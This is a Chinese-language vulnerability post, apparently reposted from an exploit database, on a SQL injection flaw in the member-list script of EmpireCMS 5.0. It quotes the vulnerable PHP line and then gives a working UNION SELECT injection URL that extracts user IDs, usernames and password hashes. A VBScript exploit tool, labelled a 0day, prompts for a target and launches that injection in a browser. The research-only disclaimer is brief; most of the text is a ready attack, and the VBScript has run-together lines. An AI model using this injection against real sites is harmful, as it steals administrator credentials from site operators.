帝国CMS5.0“/e/member/list/index.php”文件注射漏洞

漏洞文件 /e/member/list/index.php文件:内容如下：if($sear){$keyboard=RepPostVar2($_GET['keyboard']);if($keyboard){$add.=$where.$user_username." like '%$keyboard%'";}$search.="&sear=1&keyboard=$keyboard";}
判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为空就直接把keyboard带入查询产生注射漏洞.<* 参考http://www.sebug.net/vulndb/3860/ http://www.nukeblog.cn*>测试方法:[www.sebug.net]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*
VBS利用程序代码如下
DIM a,i,e,b,ie,cmd5i=InputBox ("输入目标地址 格式http://www.phome.net","帝国CMS 0DAY利用程序 BY Nuke")If i="" Thenmsgbox "请输入地址"WScript.QuitEnd Ifb=InputBox ("输入表名默认为phome_enewsuser","帝国CMS 0DAY利用程序 BY Nuke","phome_enewsuser")If b="" Thenmsgbox "请输入表名"WScript.QuitEnd Ife = "/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+" & b & "/*"ie = i & eSet a=WScript.CreateObject("InternetExplorer.Application") a.visible=True a.navigate iemsgbox "32位的MD5祝你好运！"